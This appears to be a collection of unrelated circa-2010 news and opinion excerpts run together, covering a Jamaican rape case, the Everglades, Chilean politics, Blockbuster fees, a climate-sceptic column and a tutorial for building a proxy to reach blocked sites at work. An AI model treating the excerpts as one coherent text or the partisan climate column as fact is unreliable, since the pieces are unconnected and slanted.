But the locals have other plans for this merry band of miscreants - will Lightstrider 's troupe survive ?
A Jamaican taxi driver has been accused of raping a 12 - year - old girl and then burying her alive after he thought he had strangled her to death , authorities said on Wednesday .
Garsha Wilson faces charges including rape , abduction , attempted murder and cruelty to a child , Deputy Police Superintendent Herfa Beckford said .
Wilson abducted the girl last month at a bus station in the capital , Kingston , then took her to a house in nearby St Andrew parish where he raped her and choked her until she was unconscious , Superintendent Beckford said .
Thinking she was dead , he buried her in a shallow grave and covered it with rocks , Superintendent Beckford said .
The girl , who reported the alleged crime , told police she regained consciousness and dug herself out .
Wilson was detained on March 25 but was not charged until Monday .
He is scheduled to appear in court on Friday .
His lawyer was scheduled to be in court all day Wednesday and was not available for comment , his secretary said .
Jamaican authorities say the abduction of girls has increased recently and blame taxi drivers for most cases , saying they often take advantage of female passengers travelling to rural , isolated areas .
They warn women not to travel alone if possible .
AP
Under the terms of the new deal , United States Sugar will be able to keep farming some of the land for at least seven years .
As a result , some environmental experts believe , the Everglades will be worse off in the short term .
“ What you have is just another step in the category of kicking the ball down the road and chasing it , ” said Alan Farago , the conservation chairman of Friends of the Everglades .
Criticism from other environmentalists , though , has been muted .
Some have acknowledged concerns , but do not want to say anything that might help kill what would be the largest land purchase ever for the Everglades .
With the state retaining an option to buy the rest of United States Sugar ’s land , there also remains a romantic adherence in some quarters to the dream of a restored river of grass from Lake Okeechobee to Florida Bay .
“ The whole concept that we are able to get additional land out of the E.A.A. — that has always been very difficult to do in the past , ” said John H. Hankinson Jr. , chairman of the board of directors at Audubon of Florida , referring to the Everglades Agricultural Area .
“ And that I think is ingrained in a lot of the consciousness of the people involved in this . ”
Even if the deal goes through , it could be another generation before the Everglades gets what it needs .
Mr. Buermann said the water district was still analyzing whether it could afford to pay the $ 536 million and would discuss it at a two - day board meeting beginning Wednesday .
Mr. Crist recently appointed two new members to the water board , both of whom support the purchase .
In an interview on Feb. 26 , by phone as he traveled through the Everglades on the road known as Alligator Alley , the governor said that critics of the deal would come up with “ all kinds of reasons not to do something . ”
“ But what are they doing to try and preserve the Everglades , other than complain about it ? ” he said .
“ What are they doing in a productive way to move forward and preserve this national treasure that exists nowhere else on the face of the earth ?
Nothing but complain .
I rest my case . ”
Santiago , Chile ( CNN ) -- Sebastian Pinera was sworn in Thursday as president of Chile , taking over a country battered by a recent earthquake but with a strong economy and stable social institutions .
Pinera , 60 , succeeded Michelle Bachelet , a popular president who steered the country through the global economic downturn and promoted progressive social reforms .
Pinera , a billionaire , is the first conservative to lead Chile since the fall of Gen. Augusto Pinochet 's military dictatorship in 1990 .
Educated in Chile and at Harvard University in the United States , Pinera is an economist , investor , businessman and former senator .
Bachelet , a liberal , defeated Pinera in the presidential elections in 2005 .
She endorsed Pinera 's opponent in a runoff election in January .
But Pinera said recently that responding to the earthquake requires the country to transcend partisan differences .
" These are times when we have to act with a sense of national unity , " he said .
" It is not the time for conflict between government and opposition . "
The 8.8 - magnitude earthquake and subsequent tsunami February 27 killed more than 500 people and affected up to 2 million .
A 7.2 - magnitude temblor struck Thursday as dignitaries were filing into the congressional hall in Valparaiso for the transfer of presidential power .
Under Chile 's constitutional term limits , Bachelet could not run for a second consecutive four - year term .
" I leave sad because of the pain of our people but with my head held high , " a teary - eyed Bachelet said in a brief farewell address from the La Moneda presidential palace in Santiago , Chile 's capital .
" I leave proud of what we have been able to build as a nation , of the role we have played .
" I leave , above everything else , very proud of the country we are . "
Name - calling is never nice — that much most of us learned in kindergarten .
Go ahead and criticize the substance of an action or the content of a speech , but just calling a person a nasty name is like pulling hair .
Unfortunately , a lot of it happens in the do - gooder sector–and lately , much of it has been directed at projects that could fall under the umbrella of a newish movement called “ slacktivism . ”
It ’s not hard to see where the word comes from ( slacker + activism = slacktivism ) , and obviously , it ’s usually not meant as a compliment .
Basically , it refers to doing good without having to do much at all .
It ’s inch - deep activism that you can do from the comfort of your own couch , whether that ’s clicking for good or texting to save the world .
One of the earliest forms of slacktivism was wearing one of those rubber wristbands that , for a while , were so ubiquitous — does n’t cost much money and takes even less effort .
I ’ll even give you extra points if you ’re still wearing a Livestrong bracelet five years after it was last fashionable , though if it ’s just inertia that kept it on your wrist , you have really earned your slacktivist cred .
The problem that many people have with slacktivism is that low input frequently means low impact .
I recently got a press release heralding the arrival of the “ MASSIVEGOOD movement . ”
( The organizers insist on the all caps , which is totally obnoxious and unwarranted . )
When you buy a plane ticket , reserve a hotel room , or rent a car via Web sites such as Travelocity , the travel industry will ask you to make a $ 2 contribution toward major global health causes .
Calling an automated request for $ 2 contributions a “ movement ” seems a bit rich — basically , it ’s a marketing campaign .
At least you will theoretically be able to track the effectiveness of Massivegood by counting up the dollars contributed .
( I could n’t bring myself to type the all caps again .
Sorry . )
Many slacktivist efforts have no perceptible value , monetary or otherwise .
For instance , how does announcing your bra color in your Facebook status update — as thousands of women did earlier this year — actually affect the ongoing fight against breast cancer ?
I confess it did make me giggle to see that one of my old friends from high school was rocking a purple bra , but it did not make me get a mammogram .
Here ’s the thing :
All of this does matter .
It ’s easy to rag on people trying to make the world a better place , even if they expend no more energy than it takes to point and click .
I know , because I sort of just did it .
But now I want to raise my voice in praise of slacktivism and defend those lazy zealots .
( If nothing else , slacktivism has done society the service of encouraging us to think of more fun oxymorons . )
First , some of these campaigns are having a real offline impact .
The FreeRice game , a slacktivist pioneer , has added up to real value .
Begun in October 2007 by Web developer John Breen , the game ( freerice.com ) asks you to answer questions — you get smarter ! — and for every correct answer , 10 grains of rice are donated to the UN World Food Program .
As of March 15 , 76 billion grains of rice — roughly 22 million bowls — have gone to feed the hungry , thanks to FreeRice .
Second , there ’s a certain genius to the slacktivist less - is - more calculation .
Which would I rather have–an underpaid college student standing on a street corner , clipboard in hand , trying to collect petition signatures from passersby , or a free online version that relies on potentially millions of unpaid friends who help me out with viral clicking ?
You say slacktivism , I say economies of scale .
After months of hibernation in the Bat- cave , Cartoon Network ’s surreal animated series Batman : The Brave and the Bold returns to brain - frying life Friday night with its mind on the multiversal money - shot .
Riding the same parallel - universe possibilities that energized recent films like Justice League : Crisis on Two Earths and comics like Grant Morrison ’s Final Crisis , Brave and the Bold ‘s latest episode , “ The Super Batman of Planet X ! , ” upgrades France Herron ’s 1958 story of the same name for a new millennium .
The continuity crossovers are a dizzying good time .
Brave and the Bold ‘s Batman , voiced by Diedrich Bader , accidentally opens a wormhole ( oops ! ) and lands on Herron ’s planet Zurr En Arrh , only to find that his powers are more like Superman ’s there ( as seen in the video clip below ) .
Zurr En Arrh ’s own Batman is voiced by Kevin Conroy ( who is pretty much the best Batman ever ) .
Conroy , who voiced The Dark Knight in the groundbreaking television series Batman : The Animated Series , is joined in the episode by Superman : The Animated Series voice vets like Dana Delaney ( who played Lois Lane ) and Clancy Brown ( who portrayed probably the best Lex Luthor ever ) .
The continual crossover gives The Brave and the Bold ‘s latest episode serious gravitational pull : Viewers are quickly locked into its intertextual spirals , without sacrificing anything in fun .
Perhaps the show ’s finest gift is watching Batman , who always had a beef with Superman ’s alien morality ( at least in the comics ) , get drunk on unlimited power ( as seen in the video clip below ) .
On Earth , Batman ’s mortality is always a sticking point ; unlike Superman , he really can get his ass fully kicked .
But on Zurr En Arrh , Batman is now the alien immortal .
He finally gets a chance to flex his own superhuman muscles and fly , but ends up jeopardizing his integrity and his relationships , leaving Zurr En Arrh ’s Batman no choice but to help straighten out his head .
Just as Batman has done for Superman in various comics and shows .
It ’s a clever reversal , and a blast to watch .
The Brave and the Bold is a series at the top of its game , from serious episodes featuring compelling new villain Equinox to hilarious ones with Aquaman , Plastic Man and Red Tornado .
Fearsome future episodes like “ Chill of the Night ” promise a return to Batman ’s murderous darkness .
But the series also succeeds wildly when its gets stupid funny , which also happens in “ The Super Batman of Planet X ! ”
Its opening teaser features Batman and Doctor Magnus , going undercover as a gold - toothed pimp , unleashing the goofy Metal Men on a gaggle of criminal dunces .
The scene in which Magnus ’ gold tooth flies out of his mouth and punches one of those dunces , before turning into the hero Gold , is alone worth the viewing .
When DC Comics and Warner Bros. cut short the dark carnival of The Batman and opted to go a sunnier route with The Brave and the Bold in 2008 , skeptics high on Christopher Nolan ’s blockbuster success The Dark Knight frowned on the idea .
But Batman : The Brave and the Bold has outlived that skepticism , and offered up rewarding , hilarious and challenging material for all ages .
Batman really can do it all .
Batman : The Brave and the Bold airs at 7:30 p.m. Eastern / 6:30 p.m. Central , Friday on Cartoon Network .
Image courtesy Warner Bros .
See Also :
Blockbuster Brings Back Late Fees
Fiscally challenged Blockbuster has quietly re-instituted late fees on store - based movie rentals — with a capped rate .
Beginning March 1 , the new - release movie rental period for $ 4.99 titles has been reduced to five days from seven days , with a $ 1 per day late fee assessed for up to 10 days thereafter .
The $ 1 daily fee also applies to one - day standard DVD , Blu-ray Disc and previously viewed rentals .
Previously , following the rental period , consumers were given a 10 - day grace period and charged a $ 10 fee thereafter .
The Dallas - based rental chain late last week informed company - owned stores and franchisees , according to personnel contacted at local Blockbuster locations .
“ The cool thing about it is that theoretically you could return a movie up to a year later and only be charged that $ 10 , ” said a local Blockbuster store employee , when asked about the changed policy .
Redbox charges $ 1 per day of rental ( until 9 p.m. the following day , local time ) , plus tax , for up to 25 days , when it would consider the rental a purchase .
Blockbuster spokesperson Michelle Metzger downplayed the notion that elimination of the grace period represented a return to late fees .
Metzger said the additional daily rate is consistent with what the industry is “ expecting ” and in line with what Redbox charges .
She said the new term is not like previous policies that also charged restocking fees .
She said 80 % of Blockbuster rentals are new releases , with the average customer keeping rentals 4.7 days .
“ If a customer is keeping a release out past the initial rental agreement , they are keeping that title away from somebody else , ” Metzger said .
Nonetheless , the concept of late fees represents a dual - edged sword for Blockbuster , which is struggling to cut costs and generate revenue in order to implement a multiplatform distribution channel .
Netflix largely rose to prominence on a “ no late fee ” platform underscored by a monthly subscription program that actually benefited from titles not returned on a timely basis .
Blockbuster , under its previous management , relied heavily on uncapped late fees for incremental revenue — a stigma some critics harp about to this day .
“ This is not a late fee .
This is an additional daily rate and if the customer is choosing to keep out a movie past the due date , then they are going to charged [ accordingly ] , ” Metzger said .
“ If you keep a rental car out an extra day , the rental car company has to charge you . ”
Indeed , following a fiscal quarter whereby it lost nearly $ 435 million in adjusted net income and had to revise downward fiscal year earnings and revenue projections , Blockbuster had to make changes , analysts said .
“ At $ 1 per day , it ’s very fair and comparable to what Redbox charges per rental , ” said Edward Woo , analyst with Wedbush Morgan Securities in Los Angeles .
Colleague Michael Pachter said that given Blockbuster ’s financial situation , they had to come up with ways to generate revenue .
“ Their [ previous ] pricing made no sense , and every little bit helps , ” Pachter said .
For most of a year , the small - government advocates of the “ tea party ” movement have stolen the spotlight from the Republican Party ’s veteran performers : the Christian conservatives who have long driven voters to the polls for the GOP .
Now the veterans are stealing the tea partyers lines .
In news releases , mission statements and interviews , prominent social conservatives increasingly are using the small - government rhetoric popular with the tea party activists and long used by economic conservatives -- but with a religious bent .
Their websites explore the morality of debt and the risks to religious freedom posed by growing government .
Like the tea party activists , they reverently invoke the Founding Fathers , but emphasize the role the founders ’ faith played in their writings .
The rhetorical shift is evidence of the potency of government growth as the galvanizing issue on the right .
While economic and social conservatives have a history of tensions , many conservatives see the unified opposition to President Obama ’s healthcare plan and stimulus spending as an opportunity to strengthen the bridge between the two camps before the November elections .
“ The reason why social conservatives and economic conservatives can play well together . . . is the guy who wants to go to church all day just wants to be left alone .
So does the guy who wants to play with his gun all day , and the guy who wants to make money all day , ” said Grover Norquist , president of Americans for Tax Reform .
“ They do n’t agree on how to spend their time , but they do agree on their central issue :
They want to be left alone . ”
Social conservatives emphasize that the economic message is n’t at the expense of their bread - and - butter issues -- opposition to abortion , same - sex marriage and defense of what they describe as family values .
They note that the fight over federal funding for abortion continues to bedevil the healthcare overhaul bill .
Still , social issues took a back seat to talk of constitutional principles and government spending at the podium at last month ’s Conservative Political Action Conference , an annual showcase of the right .
Of the two likely Republican presidential contenders who spoke at the event , former Massachusetts Gov. Mitt Romney made virtually no mention of social issues , a noted departure from a past CPAC appearance .
Minnesota Gov. Tim Pawlenty noted briefly that “ God is in charge ” while focusing most of his remarks on his work cutting spending in his state .
The movement is reacting to the cycle of issues , driven by current events , leaders of the religious right say .
“ There ’s an ebb and flow , ” said Andrea Lafferty , executive director of the Traditional Values Coalition .
“ After 9/11 , abortion was n’t the big thing to be discussed .
We ’re in an economic crisis , so we ’re going to talk about it .
We ’ve always believed taxing and spending is a moral issue ; how much your son or grandson is going to owe is a moral issue . ”
“ This is not a replacement strategy , ” said Rick Tyler of Renewing American Leadership , a year - old public policy group aimed at fostering the connection between social and economic conservatives .
“ We will always have the abortion fight ; that should never be given up , ” Tyler said .
“ But when the central issue of the times is jobs and the economy , we ca n’t just abandon the field .
We must provide a Christian message about jobs and economy that is based in faith . ”
Renewing American Leadership was co-founded by former Republican House Speaker Newt Gingrich .
The group argues that the strength of both American capitalism and government lies in their Judeo - Christian roots .
The alternative , “ socialism , and its American cousin , progressivism , ” has been “ hostile to free enterprise and Judeo - Christian morality , ” according to a white paper on the group ’s website .
Ralph Reed , former head of the Christian Coalition , is also talking about economics to religious voters through his new advocacy group , the Faith and Freedom Coalition .
The group is trying to boost turnout among evangelicals and already was active in New Jersey and Virginia , where Republicans won governorships last November .
Reed and others are trying to make up for lost ground in 2008 , when voter turnout among social conservatives did not keep pace with growth among Democrats ’ key constituencies .
Democrats further frustrated Republicans by making modest inroads with religious voters in 2008 , according to the Pew Research Center for the People and the Press .
A new generation of leaders on the religious right is shifting attitudes , said Lee Edwards , a fellow at the Heritage Foundation .
When the Rev. Jerry Falwell led evangelicals into politics in the late 1970s , economic conservatives were wary of the newcomers , and social conservative leaders were more narrowly focused on what they saw as defending their churches and schools .
“ I think you ’ve had a long maturation process , ” Edwards said .
“ Some of the old generation of leaders are gone and a new generation of leaders is much more comfortable with compromise , more pragmatic , more opening to working together . ”
Today that means embracing the tea party movement and its rhetoric .
Ken Blackwell , a research fellow at the Family Research Council who has also been active in the tea party movement in Ohio , is among those who see tea partyers as the “ younger siblings ” in the movement .
Social conservatives are happy to embrace the economic message and those carrying it under the tea party banner “ as long as they do n’t start advocating against traditional marriage or for abortion , ” Blackwell said , putting the tea parties in their place .
“ The sibling is not now the parent , ” he said .
Tea party leaders , too , have drawn their lines in the sand .
“ We ’ve let things like social issues distract us , ” said Jenny Beth Martin , a founder of the online umbrella group Tea Party Patriots .
Her group does not wade into the issues of abortion or marriage .
“ You know what ’s the most important social issue today ?
Putting food on the table . ”
khennessey@latimes.com
This section of John Stossel ’s “ Hands Off My Meds ” has a clip with physician Dr. Frank Fisher .
Prosecutors indicted Fisher for the deaths of several patients by prescribing pain medication .
The Doctor spent five months in jail and spent all of his money on legal fees before finally being acquitted .
The doctor mentions he is fifty - six years old and is basically starting over because the cost of defending himself left him with a net worth of zero .
The clip from did n’t fully explain just how unfairly Dr. Fisher was treated by the legal system .
Here is a bit from Stop the Drug War ( stopthedrugwar.org ) on Dr. Fisher :
It was Medi-Cal fraud charges that were at the core of Fisher ’s latest legal case .
Prosecutors originally charged Fisher with 99 counts of medical fraud regarding Medi-Cal claims and improper prescribing , but a state court judge dismissed all but eight misdemeanor counts of improper billing earlier this year .
Now , he has been found innocent .
“ Over five years ago , Attorney General Bill Lockyer came to Redding and declared that by arresting and detaining Dr. Fisher , his prosecutors had shut down the biggest drug ring in the history of Northern California , ” Reynolds continued .
“ Apparently unaware that aggressive pain management had become a widely recognized imperative of mainstream medicine , Lockyer sought to characterize Dr. Fisher ’s practice as sinister .
Most of Dr. Fisher ’s patients have been unable to obtain the quality of pain care they ’d received from him , hundreds have deteriorated unnecessarily , and several have died as a result .
At the time of Dr. Fisher ’s arrest , for example , twenty - five people who had been working , with Dr. Fisher ’s help , were forced to apply for full disability .
In response , PRN intends to hold the State of California and participating counties and municipalities accountable for their wanton and reckless conduct . ”
Here ’s what one juror had to say to Dr. Fisher in an e-mail he received after the trial : “ I was juror # 1 .
Now that I am home and can read about you on the Internet , my heart really goes out to you for what you have been through .
I was upset that the prosecutor wasted my time and the court ’s time on such a weak case .
But now that I know what you have really been through I feel embarrassed and selfish to be thinking about my own time .
I hope you can reopen your clinic some day and get back to practicing medicine , in your office or back room or anywhere you choose .
Thanks for doing the job most doctors wo n’t . ”
What caught my attention with Stossel ’s show was the discussion about fairness and medicine .
In the health care debate the argument is often made that it is unfair for someone to lose all their life saving do to an illness .
It a tragedy when someone loses all their saving do to an illness , but its not an injustice and has nothing to do with being fair .
What is unfair , is when someone loses everything due to an injustice .
Life is fair , and only people can choose to be unfair and unjust .
What is unfair is there is no call to protect people who have had their life savings destroyed by acts of an overreaching government .
There is no call for a universal insurance policy to cover individuals like Dr. Fisher from the reckless conduct of zealous prosecutors .
No charts or graphs to show the increasing costs of defending yourself in a free country .
Not a word of debate over how people can continue to afford living free when the cost of freedom has risen to everything you own plus time in prison .
There is no comparison between wanting the government to be concerned about helping its citizens when the randomness of life deals them a tragedy , and the callousness of government causing a tragedy , because the first is about charity and the second really is about fairness .
If the government is concerned about protecting people from unfairly being wiped out , it should start by looking at itself .
BEIJING —
The Chinese authorities have warned major partners of Google ’s China - based search engine that they must comply with censorship laws even if Google does not , an industry expert with knowledge of the notice said Sunday .
The Chinese government information authorities warned some of Google ’s biggest Web partners on Friday that they should prepare backup plans in case Google ceases censoring the results of searches on its local Chinese - language search engine , said the expert , who did not want to be identified for fear of retaliation by the government .
The warning was the latest indication that two months of negotiations between Chinese officials and Google over government censorship have reached an impasse , making it more likely that Google will end up shutting down its Chinese search engine .
The two sides have been at a standoff since Google announced in January that it planned to stop self - censoring the results of searches on its Chinese site , google.cn , in reaction to what it described as China - based cyberattacks on its databases and e-mail accounts .
The warning was intended to head off a wave of frustrated users should their Internet searches be stymied because of Google ’s conflict with the government .
Google controls nearly 30 percent of China ’s Internet search market .
Former Clinton adviser Dick Morris is livid over President Barack Obama ’s decision to restrict the use of nuclear weapons by the United States .
Appearing on Fox & Friends Tuesday morning , he called the move “ outrageous , ” “ absurd , ” “ beyond belief , ” and suggested his former boss might be “ anti-American . ”
ADVERTISEMENT
“ It ’s the most outrageous thing , I think , I ’ve ever heard a president of the United States say , ” he said .
“ He ’s literally saying that if an American city were gassed or hit with a biological weapon and millions were dying in the streets coughing their lungs out , or in hospital wards dying of an incurable disease , we would not use nuclear weapons to reply ?
“ It is totally absurd , ” Morris continued .
“ It ’s beyond belief that a president of the United States would say that and it shows that Barack Obama might be , might be the first anti-American president we ’ve ever had . ”
Obama ’s decision came just ahead of this week ’s far - reaching nuclear weapons summit in Washington comprising leaders of dozens of countries .
The administration hailed it as an important step to halting nuclear proliferation across the world — the main objective of the talks .
“ If a non-nuclear state is in compliance with the Nuclear Nonproliferation Treaty , the U.S. pledges not to use or threaten to use nuclear weapons against them , ” Defense Secretary Robert Gates explained .
Morris advocated for middle - of - the - road “ third way ” policies during the Clinton era , resigning from the administration in 1996 following revelations of his relationship with a prostitute .
In subsequent years he “ turned on his former boss with a vengeance , ” the Washington Post reported , and he has lately settled into a niche catering to disaffected , staunch conservatives in the age of Obama .
ADVERTISEMENT
Hyping his new book , Morris told the Fox News hosts what he thought conservatives can do to “ take back America ” and win the next election .
“ And I do n’t mean just be a Fox anchor , ” he said .
This video is from Fox News ’ Fox & Friends , broadcast April 13 , 2010 .
This is an amazing way to refresh you kitchen table .
To make this you ’ll need some blue glass ( you may use any other color ) , transparent plastic , an optical cable and good hands .
As you can see here the author made it look like there ’s a river flowing across the stall .
We Recommend :
Everyone makes mistakes , especially when it comes to entering numbers into a calculator or spreadsheet .
It ’s not such a big deal if you ’re tracking how much you spend on pizza .
But if you ’re administering drugs in a hospital , such a slip can be deadly .
Now a report in the Journal of the Royal Society Interface [ see Harold Thimbleby and Paul Cairns , http://bit.ly/cqcD83] shows how devices can be programmed to catch at least some mistakes on the spot .
Dosing a patient with 10 times too much medication is disturbingly common .
One study suggests this error occurs in 1 percent of all hospital admissions .
And though the person punching in the numbers is at fault , most drug - delivery devices do n’t help .
In one machine , for example , mistakenly entering a number with two decimal points — like 1.2.3 — might be read by the machine as 1.23 , or as a 123 .
To prevent such wild guessing , scientists tested a system that immediately flags any input that ’s not a real number .
According to their analysis , that safeguard alone could cut factor - of - 10 errors in half .
Charles Darwin once noted that “ to kill an error is as good a service as…establishing a new truth or fact . ”
Even more so when killing the error keeps you from killing a patient .
— Karen Hopkin
[ The above text is an exact transcript of this podcast . ]
“ The tractor was operating nearby and she was struck in the head .
We do n’t know if it was a piece of metal or if it was another object . ”
Our top 10 wallpapers delivered right into your mailbox , every weekend
Do a Google search like “ proxy servers ” and you ’ll find dozens of PHP proxy scripts on the Internet that will help you create your own proxy servers in minutes for free .
The only limitation with PHP based proxies is that they require a web server ( to host and run the proxy scripts ) and you also need a domain name that will act as an address for your proxy site .
If you do n’t have a web domain or have n’t rented any server space , you can still create a personal proxy server for free and that too without requiring any technical knowledge .
Create a Free Proxy Server with Google App Engine
Here ’s one such proxy site that you can build for your friends in China or even for your personal use ( say for accessing blocked sites from office ) .
This is created using Google App Engine and , contrary to what you may think , the setup is quite simple .
Go to appengine .
google.com and sign - in using your Google Account .
Click the “ Create an Application ” button .
Since this is your first time , Google will send a verification code via SMS to your mobile phone number .
Type the code and you ’re all set to create apps with Google App Engine .
Pick an Application Identifier and it becomes the sub - domain * of your proxy server .
Give your app a title ( say Proxy Server ) , set the Authentication Option as “ Open to all users ” , agree to the terms and create the application .
( screenshot ) OK , now that we have reserved the APP ID , it ’s time to create and upload the proxy server application to Google App Engine .
Go to python.org , download the 2.7 Installer and install Python .
If you are on Mac , Python 2.7 is already installed on your computer .
Download this zip file and extract it to your desktop .
The zip file contains a couple of HTML , YAML and Python ( . py ) files that you can view inside WordPad .
Go to code.google.com , download the Google App Engine SDK for Python and follow the wizard to install the SDK on your computer .
When the installation wizard has finished , click the “ Run Launcher ” button to open the App Engine Program .
Choose Edit ->
Preferences inside the Google App Engine Launcher program from the desktop and set the correct values ( see screenshot ) for the Python Path , App Engine SDK and the Text Editor ( set this is as WordPad or write . exe and not notepad.exe ) .
Click File – >
Add Existing Application under the Google App Launcher program and browse to the folder that contain the index .yaml and other files that you extracted in Step 5 .
Once the project is added to App Engine , select the project and click Edit to replace “ YOUR_APP_ID ” with your App ID ( screenshot ) .
Save and close the file .
Click Deploy , enter you Google account credentials and , within a minute or two , your online proxy server will be deployed and become ready for use ( screenshot ) .
The public URL ( or web address ) of your new proxy server will be your_app_id.appspot.com ( replace your_app_id with your App Engine Identifier ) .
PS : The sub -domain or the App ID will uniquely identify your App Engine application .
For this example , we ’ll use labnol - proxy - server as the Application Identifier though you are free to choose any other unique name .
Next Steps - Setting up a Free Proxy with Google
You can edit the main .
html file to change the appearance of your proxy website .
You can even add code for Google Analytics and Google AdSense code to monetize your proxy server .
The proxy server is public on the web ( open to everyone ) but you can add a layer of authentication so that only Google Account users who are logged - in can use your proxy server .
If you have made any changes to your HTML files , you can upload the latest version to Google App Engine either by clicking the “ Deploy ” button again or use the following command - appcfg.py update _< app- directory >_
This proxy works with Flash videos ( like YouTube and ABC News ) though not with Hulu .
As some of you have suggested , web domains with the word “ proxy ” or “ proxies ” are banned at workplaces so you may avoid using them in your appspot.com proxy address .
Though there exist proxy servers for accessing secure ( https ) sites , this is a basic proxy server that wo n’t work with sites that require logins ( like Gmail ) .
The proxy server code is available on Github and is fork of the Mirrorr project .
Things are truly the worst here in Arizona .
I was born and raised in this beautiful state .
It ’s been a challenge but it ’s not been insane – til now .
Here in Tucson , Rep. Raul Grijalva , D - Ariz. , had to close his offices yesterday to protect his staff from serious death threats .
But he was out this morning in front of an audience of hundreds , calling for optimism in this struggle for basic human rights and decency that includes all of us in Arizona and the USA against the country ’s most evil anti-immigrant , racist , and unconstitutional bill ( SB 1070 ) .
We are tired of being the laughing stock of the U.S. , we are tired of being threatened , we are more than tired , WE ARE REALLY PISSED OFF .
And we want the rest of you to also be pissed off .
One reason our legislature and governor think they can get away with this crap is that no one else in the country is paying attention or cares .
So we can use some loud voices in support of the national economic boycott of Arizona called by Raul Grijalva .
Already the American Immigration Lawyers Association has dropped plans to hold their convention here .
If you know of any other organizations who are planning events here , if you know people who are planning vacations ( the Grand Canyon is fabulous but stay away until it is safe to come ) , moving a business , buying anything from us ( especially citrus and other agricultural items ) , tell them to stop .
We are fighting against our own apartheid , our own flirtation with ethnic cleansing .
Economic sanctions are appropriate .
We listened when our brothers and sisters in South Africa called on the people of the world for economic sanctions because they knew that theirs was a greater goal ; a little suffering and struggle would yield justice and freedom .
We sustained an economic boycott here in Arizona when an earlier racist governor of the state of Arizona cancelled our Martin Luther King Day ; we won that struggle when the folks organizing the Super Bowl said they would never hold an event here in Arizona until there was a reversal .
And we can win again .
We need to know you have our back .
We have more crazies that we deserve in Arizona at the moment .
We need your support and we need an organized call from every state for real , honest , humane , and just Immigration Reform .
Photo : http://www.flickr.com/photos/dreamactivistorg/
/ CC BY 2.0
The UK government 's chief scientist , Sir John Beddington , is the latest rat to flee the sinking ship Climatology , with an interview in the Times in which he comes out of the closet :
The impact of global warming has been exaggerated by some scientists and there is an urgent need for more honest disclosure of the uncertainty of predictions about the rate of climate change , according to the Government ’s chief scientific adviser .
Now he tells us .
If Professor Beddington really believes this , it 's hard to fathom why he has n't said so in the two years in which he 's been in office .
Professor Beddington also thinks that people should be nicer to sceptics .
Professor Beddington said that climate scientists should be less hostile to sceptics who questioned man-made global warming .
He condemned scientists who refused to publish the data underpinning their reports .
Again , not a word about withholding data and code until the ship starts to go down .
Where has he been ?
The Global FlyFisher Simply the Best Place to go for Online Fly Fishing and Fly Tying https://globalflyfisher.com/video/winter-steelheading
Simply the Best Place to go for Online Fly Fishing and Fly Tying Search form Search Share / like
AUSTIN , Texas -- Texas Gov. Rick Perry has a message for wily coyotes out there :
Do n't mess with my dog .
Perry says he needed just one shot from his laser - sighted pistol to take down a coyote that was menacing his dog during an early morning jog in an undeveloped area near Austin .
Perry told The Associated Press he sometimes carries his pistol , loaded with hollow - pointed bullets , when he jogs on trails because he 's scared of snakes -- and that he'd seen coyotes in that area .
When the coyote came out of the brush toward his daughter 's labrador retriever puppy on a February jog , he charged it and shot it with his .380 Ruger pistol .
" Do n't attack my dog or you might get shot ... if you 're a coyote , " Perry said .
( This guest post previously appeared at NewDeal2.0 )
The financial crisis that first broke out in the US around the summer of 2007 and crested around the autumn of 2008 had destroyed $ 34.4 trillion of wealth globally by March 2009 , when the equity markets hit their lowest points .
On October 31 , 2007 , the total market value of publicly - traded companies around the world reached a high of $ 63 trillion .
A year and four months later , by early March 2009 , the value had dropped more than half to $ 28.6 trillion .
The lost wealth , $ 34.4 trillion , is more than the 2008 annual gross domestic product ( GDP ) of the US , the European Union and Japan combined .
This wealth deficit effect would take at least a decade to replenish even if these advanced economies were to grow at mid single digit rate after inflation and only if no double dip materializes in the markets .
At an optimistic compounded annual growth rate of 5 % , it would take over 10 years to replenish the lost wealth in the US economy .
In the US where the crisis originated in mid-2007 after two decades of monetary excess that encouraged serial debt bubbles , the NYSE Euronext ( US ) market capitalization was $ 16.6 trillion in June 2007 , more than concurrent US GDP of $ 13.8 trillion .
The market cap fell by almost half to $ 7.9 trillion by March 2009 .
US households lost almost $ 8 trillion of wealth in the stock market on top of the $ 6 trillion loss in the market value of their homes .
The total wealth loss of $ 14 trillion by US households in 2009 was equal to the entire 2008 US GDP .
As the financial crisis broke out first in the US in July 2007 , world market capitalization took some time to feel the full impact of contagion radiating from New York which did not register fully globally until after October 2007 .
In 2008 alone , market capitalization in EAME ( Europe – Africa – Middle East ) economies lost $ 10 trillion and Asian shares lost around $ 9.6 trillion .
Government Bailouts , Stimulus Packages and Jobless Recovery
As a result of over $ 20 trillion of government bailout / stimulus commitments / spending that began in 2008 worldwide , the critically impaired global equity markets finally began to show tenuous signs of stabilization only two years later by the end of 2009 .
Yet total world market capitalization was still only $ 46.6 trillion by the end of January 2010 , $ 16.4 trillion below its peak in October 2007 .
The amount of wealth lost worldwide in 2009 still exceeded 2009 US GDP of $ 14.2 trillion by $ 2.2 trillion .
The NYSE Euronext ( US ) market capitalization was $ 12.2 trillion in January 2010 , recovering from its low at $ 7.9 trillion in March 2009 , but still $ 4.4 trillion below its peak at $ 16.6 trillion in June 2007 .
US GDP in first quarter 2009 fell 6.3 % annualized rate while fourth quarter of 2009 surged 5.7 % mostly as a result of public sector spending equaling over 60 % of annual GDP .
The US government bailout and stimulus package to respond to the financial crisis added up to $ 9.7 trillion , enough to pay off more than 90 % of the nation ’s home mortgages , calculated at $ 10.5 trillion by the Federal Reserve .
Yet home foreclosure rate continued to climb because only distressed financial institutions were bailed out , but not distressed homeowners .
Take away public sector spending , US GDP would fall by over 50 % .
This is the reason why no exit strategy can be expected to be implemented soon in the US .
It took $ 20 trillion of public funds over a period of two and a half years to lift the total world market capitalization of listed companies by $ 16.4 trillion .
This means some $ 3.6 trillion , or 17.5 % , had been burned up by transmission friction .
Government intervention failed to produce a dollar - for - dollar break - even impact on battered markets , let alone generating any multiplier effect which in normal time could be expected to generate a multiplying effect of between 9 and 11 times .
In the mean time , the real global economy , detached from the equity markets , with the exception of China ’s , continues to slide downward , with rising unemployment and underemployment .
This massive government injection of new money managed to stabilize world equity markets by January 2010 , but only at 73.5 % of its peak value in October 2007 .
Still it left the credit markets around the world dangerously anemic and the real economy operating on intensive care and life support measures from government .
This is because the bailout and stimulus money failed to land on the demand side of the economy which has been plagued by overcapacity fueled by inadequate workers income masked by excessive debt , and by a drastic reversal of the wealth effect on consumer demand from the bursting of the debt bubble .
The burst of the debt bubble had destroyed the wealth it buoyed , but it left the debt that had fueled the bubble standing as liability in the economy .
Much of the new government money came from adding to the national debt , for which taxpayers would still have to pay back in future years .
